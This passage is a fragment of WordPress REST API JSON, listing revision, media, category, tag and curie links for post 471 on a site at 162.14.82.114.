nt":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/471\/revisions"}],"predecessor-version":[{"id":476,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/471\/revisions\/476"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=471"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=471"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=471"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}